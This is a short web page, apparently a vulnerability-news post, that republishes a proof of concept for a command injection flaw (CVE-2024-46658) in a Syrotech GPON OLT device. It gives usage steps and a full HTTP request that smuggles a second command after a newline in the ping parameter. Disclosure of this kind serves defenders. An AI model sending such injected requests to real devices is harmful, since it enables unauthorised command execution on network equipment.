Vulnerabilities — Tools

PoC CVE-2024-46658 - Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629

, and Dark Web Informer

3 October 2024 . 7:25 PM

1 min read

GitHub:https://github.com/jackalkarlos/CVE-2024-46658
Last Commit: October 3rd, 2024

Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 Command Injection Vulnerability

Usage

1- Edit the URL in the script.

2- Edit the Cookie_Login value in the script.

3- Run the script, it will allow you to executing commands.

Vulnerability Details

GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1

Normally, only the ping command is allowed to be executed in the administration panel.

If you intercept the request with a proxy, add a new line byte to the end of the command parameter and type the command you want to run, it will allow you to run another command.

Authors

Mehmet Demir

Latest

Articles

Daily Dose of Dark Web Informer - November 20th, 2024

, and Dark Web Informer

21 November 2024

Paid Members Public

Data Breaches

A Threat Actor is Allegedly Selling Access to an Unidentified Energy Company in Latin America With $3 Billion in Revenue

, and Dark Web Informer

20 November 2024

Paid Members Public

Leaks

grep Claims to have Leaked the Data of Portnov Computer School

, and Dark Web Informer

20 November 2024

Paid Members Public

Leaks

A Threat Actor Claims to have Leaked the Data of Royal Thai Consulate-General in Chennai

, and Dark Web Informer

20 November 2024

Paid Members Public

PoC CVE-2024-46658 - Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629

Usage

Vulnerability Details

Authors

Related

Latest